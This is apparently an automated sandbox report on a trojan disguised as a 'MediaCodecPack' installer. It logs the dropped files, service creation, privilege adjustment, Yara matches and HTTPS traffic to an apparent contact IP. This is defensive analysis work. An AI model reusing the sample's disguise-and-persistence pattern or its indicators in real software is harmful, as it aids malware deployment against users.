                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.8:49708 version: TLS 1.2
                    Source: is-L8DJ5.tmp.1.drBinary or memory string: DirectDrawCreateExmemstr_2baea9e2-c
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0042F520 NtdllDefWindowProc_A,1_2_0042F520
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00423B84 NtdllDefWindowProc_A,1_2_00423B84
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004125D8 NtdllDefWindowProc_A,1_2_004125D8
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00478AC0 NtdllDefWindowProc_A,1_2_00478AC0
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_00457594
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E934
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_0040840C0_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004706A81_2_004706A8
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004809F71_2_004809F7
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004352C81_2_004352C8
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004673A41_2_004673A4
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0043DD501_2_0043DD50
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0043035C1_2_0043035C
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004444C81_2_004444C8
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004345C41_2_004345C4
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00444A701_2_00444A70
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00486BD01_2_00486BD0
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00430EE81_2_00430EE8
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0045F0C41_2_0045F0C4
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004451681_2_00445168
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0045B1741_2_0045B174
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004694041_2_00469404
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004455741_2_00445574
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004519BC1_2_004519BC
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00487B301_2_00487B30
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0048DF541_2_0048DF54
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_004010003_2_00401000
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_004067B73_2_004067B7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609660FA3_2_609660FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6092114F3_2_6092114F
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6091F2C93_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096923E3_2_6096923E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6093323D3_2_6093323D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6095C3143_2_6095C314
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609503123_2_60950312
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094D33B3_2_6094D33B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6093B3683_2_6093B368
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096748C3_2_6096748C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6093F42E3_2_6093F42E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609544703_2_60954470
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609615FA3_2_609615FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096A5EE3_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096D6A43_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609606A83_2_609606A8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609326543_2_60932654
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609556653_2_60955665
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094B7DB3_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6092F74D3_2_6092F74D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609648073_2_60964807
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094E9BC3_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_609379293_2_60937929
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6093FAD63_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6096DAE83_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_6094DA3A3_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60936B273_2_60936B27
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60954CF63_2_60954CF6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60950C6B3_2_60950C6B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60966DF13_2_60966DF1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60963D353_2_60963D35
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60909E9C3_2_60909E9C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60951E863_2_60951E86
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60912E0B3_2_60912E0B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_60954FF83_2_60954FF8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D5BAFD3_2_02D5BAFD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D62A803_2_02D62A80
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D5D32F3_2_02D5D32F
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D570C03_2_02D570C0
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D4E07E3_2_02D4E07E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D6267D3_2_02D6267D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D5B6093_2_02D5B609
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D5874A3_2_02D5874A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D5BF153_2_02D5BF15
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D60DB43_2_02D60DB4
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\MediaCodecPack\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: String function: 00408C0C appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: String function: 00406AC4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: String function: 0040595C appears 117 times
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: String function: 00457F1C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: String function: 00403400 appears 60 times
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: String function: 00445DD4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: String function: 00457D10 appears 96 times
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: String function: 004344DC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: String function: 004078F4 appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: String function: 00403494 appears 83 times
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: String function: 00403684 appears 225 times
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: String function: 00453344 appears 97 times
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: String function: 004460A4 appears 59 times
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: String function: 02D57760 appears 32 times
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: String function: 02D62A10 appears 136 times
                    Source: Hbq580QZAR.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: Hbq580QZAR.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: Hbq580QZAR.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-TV2PJ.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-TV2PJ.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-TV2PJ.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.3.drStatic PE information: Number of sections : 19 > 10
                    Source: is-FD66D.tmp.1.drStatic PE information: Number of sections : 19 > 10
                    Source: Hbq580QZAR.exe, 00000000.00000003.1481137225.0000000002300000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Hbq580QZAR.exe
                    Source: Hbq580QZAR.exe, 00000000.00000003.1481298794.0000000002098000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Hbq580QZAR.exe
                    Source: Hbq580QZAR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@5/26@0/2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D4F8D0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,3_2_02D4F8D0
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455E0C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_00401CF9
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0046E0E4 GetVersion,CoCreateInstance,1_2_0046E0E4
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409C34
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_00401951 GetLocalTime,StartServiceCtrlDispatcherA,lstrcmpiW,3_2_00401951
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_00401951 GetLocalTime,StartServiceCtrlDispatcherA,lstrcmpiW,3_2_00401951
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_0040DEE9 StartServiceCtrlDispatcherA,3_2_0040DEE9
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeFile created: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmpJump to behavior
                    Source: Yara matchFile source: 3.0.mediacodecpack.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2736047862.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.1493879108.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-K5SAB.tmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: mediacodecpack.exe, mediacodecpack.exe, 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, mediacodecpack.exe, 00000003.00000003.1802185636.000000000081B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.3.dr, is-FD66D.tmp.1.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: Hbq580QZAR.exeReversingLabs: Detection: 18%
                    Source: Hbq580QZAR.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: Hbq580QZAR.exeString found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeFile read: C:\Users\user\Desktop\Hbq580QZAR.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Hbq580QZAR.exe "C:\Users\user\Desktop\Hbq580QZAR.exe"
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeProcess created: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp "C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp" /SL5="$1042E,3196748,56832,C:\Users\user\Desktop\Hbq580QZAR.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpProcess created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeProcess created: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp "C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp" /SL5="$1042E,3196748,56832,C:\Users\user\Desktop\Hbq580QZAR.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpProcess created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -iJump to behavior
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpSection loaded: wintypes.dllJump to behavior
